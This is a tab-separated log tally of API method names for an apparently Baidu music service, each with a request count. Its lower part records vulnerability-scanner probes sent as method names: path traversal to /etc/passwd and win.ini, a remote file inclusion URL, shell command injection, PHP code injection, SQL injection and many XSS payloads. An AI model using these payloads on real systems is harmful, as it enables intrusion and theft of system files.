baidu.ting.song.getInfos	63539035
baidu.ting.song.baseInfo	31377949
baidu.ting.search.lrcpic	24881153
baidu.ting.search.catalogSug	17895839
baidu.ting.user.listenAge	17699031
baidu.ting.search.common	15295587
baidu.ting.song.play	14938298
baidu.ting.song.down	9250086
baidu.ting.song.lry	6413585
baidu.ting.billboard.billList	6224415
baidu.ting.user.getUserBaseInfo	5625997
baidu.ting.search.getPhotoInfos	5587483
baidu.ting.user.checkSuggestVersion	5525578
baidu.ting.search.lrcys	5337182
baidu.ting.song.getInfo	5155524
baidu.ting.artist.getSongList	5020601
baidu.ting.artist.getList	4832817
ting.baidu.diy.getPlaylists	4552595
baidu.ting.plaza.getFocusPic	4088391
baidu.ting.game.gamedetail	3232557
baidu.ting.user.checkComVersion	3048365
baidu.ting.plaza.getRecommendAlbum	3045720
baidu.ting.diy.gedanInfo	2887274
baidu.ting.plaza.active	2585759
baidu.ting.radio.playAction	2459659
baidu.ting.active.start	2172901
baidu.ting.artist.getInfo	1948016
baidu.ting.user.config	1845615
baidu.ting.diy.gedanHot	1643913
baidu.ting.search.suggestion	1390280
baidu.ting.artist.getinfo	1371765
baidu.ting.diy.category	1290321
ting.baidu.plaza.recdaily	1273457
baidu.ting.favorite.getCollectSong	1229755
baidu.ting.diy.getNowOfficalList	1214243
baidu.ting.diy.getSongFromOfficalList	1205003
baidu.ting.radio.getChannelSong	1175928
baidu.ting.album.getAlbumInfo	1095288
baidu.ting.diy.addListenCount	1025252
baidu.ting.plaza.getPartDesc	974104
baidu.ting.song.playAAC	884992
baidu.ting.plaza.recdaily	845301
baidu.ting.song.audio	811826
baidu.ting.artist.getAlbumList	753752
baidu.ting.favorite.isCollect	734429
baidu.ting.tag.songlist	696713
baidu.ting.diy.gedan	632005
baidu.ting.tag.getHotTag	605356
baidu.ting.user.RegistToImsg	599673
	582488
baidu.ting.user.down	525613
baidu.ting.radio.getCategoryList	458398
baidu.ting.search.getPhotoInfo	390475
baidu.ting.feedback.song	365342
baidu.ting.search.lrcyss	356494
baidu.ting.billboard.billCategory	355279
baidu.ting.artist.get72HotArtist	288949
baidu.ting.diy.getPlaylists	262628
baidu.ting.favorite.getFavoriteSong	204998
baidu.ting.song.buffer	185599
baidu.ting.plaza.recommend	182274
baidu.ting.video.getList	155728
baidu.ting.game.gamelist	138029
baidu.ting.favorite.addSongFavorites	128642
baidu.ting.song.getMulInfos	127502
baidu.ting.tag.getAllTag	110088
baidu.ting.diy.search	101494
baidu.ting.diy.getSimilarGedan	100407
baidu.ting.diy.getOfficialDiyList	90154
baidu.ting.video.play	71074
baidu.ting.artist.getSpecialSongList	64958
baidu.ting.user.checkVersion	63722
baidu.ting.favorite.addSongFavorite	56561
baidu.ting.plaza.getNewSongs	49328
baidu.ting.favorite.delCollectSong	44756
ting.baidu.diy.getPlaylist	31143
baidu.ting.radio.getArtistChannelSong	26947
baidu.ting.radio.getFavoriteSong	24941
baidu.ting.plaza.getArtistPlaza	19685
baidu.ting.radio.serv	19261
baidu.ting.diy.getPlaylist	18603
baidu.ting.artist.getHighSongTitle	14849
baidu.ting.feedback.crash	13172
baidu.ting.album.getList	12570
baidu.ting.diy.saveList	10982
ting.baidu.film.getFilmInfo	9028
baidu.ting.song.cloud	8046
baidu.ting.favorite.delSongFavorite	7344
baidu.ting.song.getMulInfo	7210
baidu.ting.artist.getQianQianArtist	6558
baidu.ting.user.nplogin	6451
baidu.ting.diy.delListSong	5130
baidu.ting.video.category	5121
baidu.ting.diy.addListSong	4558
baidu.ting.user.logout	4521
baidu.ting.weixin.response	4149
baidu.ting.diy.delList	4130
baidu.ting.user.regPassport	3922
baidu.ting.billboard.catalog	3705
baidu.ting.colorRing.listen	3685
baidu.ting.artist.getHighSongList	3216
ting.baidu.artistapp.renum	2779
baidu.ting.colorRing.getCode	2619
baidu.ting.user.getMobileVcode	2535
baidu.ting.colorRing.authset	2131
baidu.ting.favorite.delSongFavorites	1898
ting.baidu.song.lry	1700
baidu.ting.feedback.info	1546
baidu.ting.favorite.getFavoriteAlbum	1525
baidu.ting.artist.getSongRank	1400
baidu.ting.artist.getSong	1396
baidu.ting.artist.getSongVote	1361
baidu.ting.user.registToUC	1247
baidu.ting.diy.upList	1112
baidu.ting.user.getMessage	1053
ting.baidu.artistapp.brief	797
baidu.ting.diy.addList	777
baidu.ting.game.catalog	748
baidu.ting.diy.getRecommendSpeical	720
baidu.ting.video.recMv	586
baidu.ting.favorite.getListenHistory	582
baidu.ting.song.getSuoSongInfo	463
baidu.ting.colorRing.toneselect	403
baidu.ting.game.gameplay	384
baidu.ting.colorRing.subscribe	357
baidu.ting.user.activate	322
baidu.ting.favorite.getOffenListenList	304
baidu.ting.artist.getInfoByName	304
baidu.ting.artistapp.photo	270
baidu.ting.song.getHash	208
baidu.ting.favorite.getInfoFromView	172
baidu.ting.user.login	168
baidu.ting.favorite.addAlbumFavorite	166
ting.baidu.artistapp.newList	149
baidu.ting.plaza.getMisNewSong	128
ting.baidu.artistapp.news	118
ting.baidu.artistapp.briefs	98
baidu.ting.favorite.delAlbumFavorite	81
baidu.ting.user.addPassportInfo	75
baidu.ting.mv.getIndexMV	64
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	45
baidu.ting.album.getAlbumstyle	42
(	42
\' (	40
ting.baidu.mv.playmv	40
baidu.ting.mv.playMV	35
baidu.ting.song.gepInfos	26
ting.baidu.mv.searchMV	22
baidu.ting.mv.searchMV	17
ting.baidu.mv.getArtistMVInfo	15
c:/windows/win.ini_	14
../../../../../../../../../../etc/passwd_	14
http://cirt.lnet/rfiinc.txt	14
../../../../../../../../../../etc/passwd	14
set	14
/usr/bin/id;	14
file:///etc/rc.d/rc.local_	14
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	14
c:/windows/win.ini	14
1\\\";cat /etc/rc.d/rc.local;\\\"	14
file:///etc/rc.d/rc.local	14
1;cat /etc/rc.d/rc.local;	14
string:{var_dump(md5(812812))}	14
${	14
%{	14
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	14
\'];${@print(md5(812812))};//	14
1\';cat /etc/rc.d/rc.local;\'	14
http://cirt.lnet/rfiinc.txt_	14
../../../../../../../../../../etc/rc.d/rc.local	14
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	14
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	14
${@print(md5(812812))}	13
ting.baidu.mv.getMultiSongMVInfo	13
file:///etc/passwd	13
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	12
../../../../../../../../../../etc/rc.d/rc.local_	12
file:///etc/passwd_	12
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	10
baidu.ting.artist.getInfoList	9
baidu.ting.song.lry\';alert(1);\'	8
../../../../../../../../../../etc/passwd_.htm	6
ting.baidu.game.gamedetail	6
baidu.ting.song.play\';alert(1);\'	6
baidu.ting.billboard.billListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
baidu.ting.outerPassport.profile	5
c:/windows/win.ini_.jpeg	5
../../../../../../../../../../etc/rc.d/rc.local_.html	5
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpeg	5
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	4
baidu.ting.song.play\') and 8288=8288 and (\'	4
../../../../../../../../../../etc/passwd_.jpg	4
baidu.ting.song.lry\') and 8288=8288 and (\'	4
baidu.ting.song.lry\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	4
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	4
baidu.ting.song.play\' and \'8281\'=\'8281	4
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	4
baidu.ting.song.lry\' and \'8281\'=\'8281	4
baidu.ting.song.lry\'>\"></title></textarea></script><img src=a onerror=alert(1)>	4
baidu.ting.song.lryjavascript:alert(1)	4
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	4
baidu.ting.song.lry\'\";alert(1);//	4
http://cirt.lnet/rfiinc.txt_.html	4
baidu.ting.song.lry\";alert(1);\"	4
http://cirt.lnet/rfiinc.txt_.htm	4
baidu.ting.song.play;alert(1);//	4
baidu.ting.song.lry;alert(1);//	4
file:///etc/passwd_.html	4
file:///etc/rc.d/rc.local_.htm	4
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	4
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	4
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	4
../../../../../../../../../../etc/rc.d/rc.local_.php	4
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	4
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	4
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	4
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	4
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	4
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	4
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	4
baidu.ting.song.lry--></script><script>alert(1)</script>	4
baidu.ting.song.lry</script><script>alert(1);//	4
baidu.ting.song.lry<script>confirm(1)</script>	4
../../../../../../../../../../etc/passwd_.html	3
baidu.ting.song.playjavascript:alert(1)	3
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	3
ting.baidu.plaza.active	3
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	3
baidu.ting.song.play\'\";alert(1);//	3
ting.baidu.game.catalog	3
ting.baidu.search.playback	3
ting.baidu.plaza.recommend	3
file:///etc/passwd_.jpg	3
baidu.ting.song.play\";alert(1);\"	3
c:/windows/win.ini_.jpg	3
c:/windows/win.ini_.htm	3
ting.baidu.song.audio	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.php	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	3
http://cirt.lnet/rfiinc.txt_.jpg	3
ting.baidu.feedback.crash	3
file:///etc/rc.d/rc.local_.jpeg	3
ting.baidu.artistapp.send	3
file:///etc/rc.d/rc.local_.php	3
file:///etc/passwd_.jpeg	3
ting.baidu.diy.gedan	3
baidu.ting.song.play</textarea></title><script>alert(1)</script>	3
baidu.ting.song.play>\'>\"><script>alert(1)</script>	3
../../../../../../../../../../etc/rc.d/rc.local_.htm	3
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.htm	3
baidu.ting.song.play</script><script>alert(1);//	3
baidu.ting.tag.getHotTagabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.play<script>confirm(1)</script>	3
baidu.ting.artist.getListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.play--></script><script>alert(1)</script>	3
baidu.ting.billboard.billList\'\";alert(1);//	2
baidu.ting.billboard.billList\';alert(1);\'	2
baidu.ting.plaza.getFocusPic\';alert(1);\'	2
baidu.ting.billboard.billList<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
baidu.ting.billboard.billList;alert(1);//	2
baidu.ting.tag.getHotTag<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
baidu.ting.billboard.billList\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.tag.getHotTag\';alert(1);\'	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpeg	2
baidu.ting.billboard.billList\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
file:///etc/passwd_.php	2
c:/windows/win.ini_.php	2
http://10.42.7.217/?1383760614.24	2
http://10.42.7.217/?1383778504.61	2
http://10.42.7.217/?1383778425.49	2
http://10.42.7.217/?1383778422.59	2
http://10.42.7.217/?1383766634.79	2
http://10.42.7.217/?1383766618.35	2
http://10.42.7.217/?1383765653.95	2
http://10.42.7.217/?1383760601.77	2
http://10.42.7.217/?1383756483.18	2
http://10.42.7.217/?1383751868.93	2
http://10.42.7.217/?1383746045.25	2
http://10.42.7.217/?1383742706.02	2
http://cirt.lnet/rfiinc.txt_.php	2
http://10.42.7.217/?1383778426.8	2
file:///etc/rc.d/rc.local_.html	2
file:///etc/rc.d/rc.local_.jpg	2
baidu.ting.billboard.billList%\' and 8281=8281 and \'%\'=\'	2
baidu.ting.billboard.billList<script>confirm(1)</script>	2
baidu.ting.billboard.billList\') and 8288=8288 and (\'	2
baidu.ting.billboard.billList(\')\'))(\")\'\"\"\"\")	2
baidu.ting.billboard.billList--></script><script>alert(1)</script>	2
baidu.ting.billboard.billList</textarea></title><script>alert(1)</script>	2
baidu.ting.billboard.billList>\'>\"><script>alert(1)</script>	2
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.html	2
baidu.ting.plaza.getFocusPicabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	2
baidu.ting.billboard.billList\' and \'8281\'=\'8281	2
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.php	2
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpg	2
baidu.ting.billboard.billList\"><img src=1 onerror=alert(1)>	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.htm	2
baidu.ting.plaza.getFocusPic\'\";alert(1);//	1
baidu.ting.tag.getHotTagjavascript:alert(1)	1
baidu.ting.billboard.billList\";alert(1);\"	1
